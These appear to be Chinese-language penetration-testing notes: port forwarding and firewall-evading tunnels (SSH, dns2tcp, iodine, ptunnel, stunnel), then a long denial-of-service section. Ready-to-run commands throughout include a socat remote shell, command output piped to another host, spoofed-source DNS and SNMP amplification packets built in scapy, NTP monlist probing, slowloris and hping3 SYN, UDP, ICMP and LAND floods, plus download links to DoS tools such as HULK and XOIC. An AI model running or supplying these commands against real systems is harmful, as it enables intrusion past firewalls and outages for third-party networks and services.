Rinetd重定向
1. 安裝rinetd:apt-get install rinetd
2. 配置:/etc/rinetd.conf文件中輸入bindadd bindport connectadd connectport4個參數即:偵聽主機ip,偵聽端口,轉發主機,轉發端口
3. 運行:rinetd:
a) 查看運行進程:ps aux | grep rinetd,
b) 殺掉進程:pkill rinetd,
c) 查看端口:netstat –pantu | grep :53.
SSH本地端口轉發
1. 修改配置文件,可使用root賬號,更改/etc/ssh/sshd_config文件。
–PermitRootLogin yes
– Port 53
– PasswordAuthentication yes
2.本地 啓動SSH偵聽:service ssh start,查看53端口:netstat –pantu | grep :53
▪ ssh -fCNg -L <listen port>:<remote ip>:<remote port> user@<sshserver> -p <ssh server port>
▪ ssh -fCNg -L <listen port>:localhost:<remote port> user@<sshserver> -p <ssh port>
SSH遠程端口轉發
1. 遠程服務器開啓SSH,開啓偵聽:
a) ▪ ssh -fNg -R <listen port>:<remote ip>:<remote port> user@<SSH server> -p
<ssh server port>
協議隧道(穿透防火牆)
1. dns2tcpd隧道,修改服務端配置文件:/etc/dns2tcpd.conf
Listen = 0.0.0.0 , port = 53 , user = nobody, chroot = /tmp , key = password123 , domain=test.lab.com,resources = ssh:127.0.0.1:22,smtp:127.0.0.1:25,socks:127.0.0.1:1082,https:127.0.0.1:8087,http:127.0.0.1:3128
2. 服務器啓動命令:dns2tcpd –F –d 1 –f /etc/dns2tcpd.conf
3. 客戶端通過使用不同協議連接服務器如SSH連接命令: dns2tcpc -c -k pass -d 1 -l 2222 -r ssh -z test.lab.com 會被服務端dns2tcpd.conf配置文件中配置的resources重定向到服務器指定的22端口轉發。
4. iodine隧道:
a) 方法一:
i. 創建服務端隧道網卡:iodined –f –c 10.0.0.1 test.lab.com
ii. 客戶端連接隧道:iodine –f test.lab.com
iii. 使用ping 10.0.0.1是否通過防火牆建立連接。
iv. 使用ssh連接:ssh -CfNg -D 7001 [email protected]
b) 方法二:
i. 服務端安裝tap網卡驅動: https://openvpn.net/index.php/open-source/downloads.html
ii. Widows客戶端: – http://code.kryo.se/iodine/ – iodine -f test.lab.com
5. Ncat功能:
a) 代理:ncat -l 8080 --proxy-type http --proxy-auth user:pass
b) 連接broker方式: 服務端:ncat -l 333 –broker 客戶端:ncat 1.1.1.1 --sh-exec "echo `pwd`“
c) 文件傳輸:ncat --send-only 1.1.1.1 333 < inputfile
6. Socat功能:
a) 遠程shell獲取: 服務端: socat tcp-l:23 exec:sh,pty,stderr 客戶端 連接端口獲取shell:Socat - tcp:1.1.1.1:23
b) 遠程執行命令:
i. 服務器:socat - udp-l:2001
ii. 客戶端:echo “`id`” | socat - udp4-datagram:1.1.1.1:2001
c) 端口轉發:socat tcp4-listen:22,fork tcp4:1.1.1.1:22
d) 連接端口:Socat - tcp:1.1.1.1:80
e) 偵聽端口:socat - tcp4-listen:22 / socat - tcp-l:333
f) 發送文件:cat 1.txt | socat - tcp4:1.1.1.1:333
g) 接受文件:socat tcp4-listen:333 open:2.txt,creat,append
h) Udp全端口任意內容發包: 命令:for PORT in {1..65535}; do echo “aaaaa" | socat - UDP4-DATAGRAM: 1.1.1.1:$PORT; sleep .1; done
命令:echo “’id’” |socat – udp-datagram:192.168.0.110:2000
i) 二進制編輯器: echo -e "\0\14\0\0\c" | socat -u - file:/usr/bin/ squid.exe,seek,seek=0x00074420
j) 簡單的web服務器: socat -T 1 -d -d TCP-L:10081,reuseaddr,fork,crlf SYSTEM:"echo -e \"\\ \"HTTP/1.0 200 OK\\\nDocumentType: text/plain\\\n\\\ndate: \$\(date\)\\ \nserver:\$SOCAT_SOCKADDR:\$SOCAT_SOCKPORT\\\nclient: \ $SOCAT_PEERADDR:\$SOCAT_PEERPORT\\\n\\\"\"; cat; echo -e \"\\\"\\\n\ \\"\""
7. Ptunnle命令,通過ping實現隧道:
a) 服務器:ptunnel -x 1234
b) 客戶端:sudo ptunnel -p proxy -lp 2222 -da destination -dp 22 -x 1234
c) 嵌套SSH隧道:ssh -CNfg -D 7000 [email protected] -p 2222
8. Proxytunnle命令:
方法一: 1.內網安裝squid3代理、proxytunnle: vi /etc/squid3/squid.conf /^http_port /^http_access /^ac 2. 創建隧道:proxytunnle -a 80 -p 127.0.0.1:3128 -d 192.168.1.1:80
方法二:
1. 外網安裝squid3代理服務器並偵聽80端口:
2. 創建隧道:proxytunnle -a 80 -p 127.0.0.1:3128 -r 192.168.1.1:80 -d 192.168.1.1:22
方法三:
1. SSH客戶端配置自動創建代理: vi ~/.ssh/config Host 192.168.1.1 Hostname 192.168.1.1 ProtocolKeepAlives 30 ProxyCommand /usr/bin/proxytunnel -p 1.1.1.1:3128 -r 192.168.1.1:80 -d %h:%p
9. sslh端口分配器:vim /etc/default/sslh, RUN-yes DAEMON=/usr/sbin/sslh DAEMON_OPTS=”--user sslh --listen 1.1.1.10:443 --ssh 127.0.0.1:22 --ssl 1.1.1.11:443 --http 127.0.0.0:80 --pidfile /var/run/sslh/sslh.pid”
10. stunnel4服務器: a) 生成證書:openssl req -new –days 365 -nodes -x509 -out /etc/stunnel/ stunnel.pem -keyout /etc/stunnel/stunnel.pem b) 創建配置文件:
i. cert = /etc/stunnel/stunnel.pem
ii. ▪ setuid = stunnel4
iii. ▪ setgid = stunnel4
iv. ▪ pid = /var/run/stunnel4/stunnel4.pid
v. ▪ [mysqls]
vi. ▪ accept = 0.0.0.0:443
vii. ▪ connect = 1.1.1.11:3306
c) 自動啓動:– /etc/default/stunnel4,▪ ENABLED=1
d) 啓動stunnel4服務端:service stunnel4 start
e)客戶端配置(kali自帶):
創建配置文件:/etc/stunnel/stunnel.conf
▪ client = yes
▪ [mysqls]
▪ accept = 3306
▪ connect = 192.168.1.11:443
f)客戶端自啓:/etc/default/stunnel4,▪ ENABLED=1
g)啓動客戶端:– service stunnel4 stop / start
流量攻擊DOS
1. 發送ip數據包:
a) scapy,i=IP(),i.dst=’192.168.0.119’,t=TCP(),t.dport=22,sr1(i/t,verbose=1,timeout=2)
2. 抓包工具wireshark過濾抓包:ip.addr eq 192.168.0.111
3. DOS攻擊:通過發送請求3次握手建立連接,使用iptables規則丟棄對方響應數據包從而達到對方保持短時間持續連接佔用資源的效果。 iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
4. DNS攻擊:通過向dns發送數據包訪問各種服務器,將數據包響應地址改爲目標主機ip。通過響應數據包堵死目標主機。 Scapy構造數據包: i=IP() i.dst="202.106.0.20" i.src="1.1.1.1" i.display() u=UDP() u.display() u.dport d=DNS() d.rd=1 d.qddount=1 d.display() q=DNSQR() q.qname='hp.com' q.qtype=255 q.display() d.qd=q d.display() r= (i/u/d) r.display() r sr1(r) send(r)
5. Snmp網絡協議管理站攻擊:通過向snmp服務端發送數據包請求,僞造源地址,snmp響應給攻擊目標。到達攻擊效果。 i=IP() i.dst=“1.1.1.1" i.display() u=UDP() u.dport=161 u.sport=161 s=SNMP() s.community= 'public' s.display() b=SNMPbulk() b.display() b.max_repetitions = 100 b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')), SNMPvarbind(oid=ASN1_OID(' 1.3.6.1.2.1.19.1.3'))] s.PDU=b snmp.display() r= (i/u/s) r.display() Sr1(r) send(r)
6. 通過時間服務器發動攻擊: 查看開發ntp端口: nmap -sU -p123 1.1.1.1 / 127.0.0.1 發現漏洞: ntpdc -n -c monlist 1.1.1.1 ntpq -c rv 1.1.1.1 ntpdc -c sysinfo 192.168.20.5 開啓ntp服務(註釋掉):/etc/ntp.conf restrict -4 default kod nomodify notrap nopeer noquery restrict -6 default kod nomodify notrap nopeer noquery
7. 應用層dos慢速攻擊:最大併發ulimite -n 70000,apt-get install slowhttptest, http post攻擊模式:slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://1.1.1.1 -x 10 -p 3 slowloris攻擊模式:slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http:// 1.1.1.1 -x 24 -p 3
8. Hping3攻擊:可以定製發送任何tcp/ip數據包。 Syn flood攻擊: hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1 hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1 hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 (TCP FLOOD)ICMP Flood攻擊:hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2 UDP Flood攻擊:hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2 LAND攻擊:hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1 TCPDos攻擊:nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1 查公網IP:nping --echo-client "public" echo.nmap.org –udp
9. Siege(壓力測試http/https)工具:模擬多個用戶請求。 siege -g http://1.1.1.1/a.php / 1.1.1.1 siege -i -c 1000 ▪ /etc/siege/urls.txt(-f參數指定字典)
10. T50 網絡壓力測試: t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80 t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
11. 匿名者(拒絕服務攻擊組織)發佈的DOS工具:LOIC 、 HOIC 、 DDoSer、DDOSIM、GoldenEye 其他拒絕服務工具:XOIC 攻擊任意IP地址的指定端口: – git clone git://git.code.sf.net/p/xoic/code xoic-code – https://xoicdoser.wordpress.com/ – 三種模式:test、normal、Dos Attack – 支持協議:TCP/HTTP/UDP/ICMP HULK - Http Unbearable Load King: – https://packetstormsecurity.com/files/download/112856/hulk.zip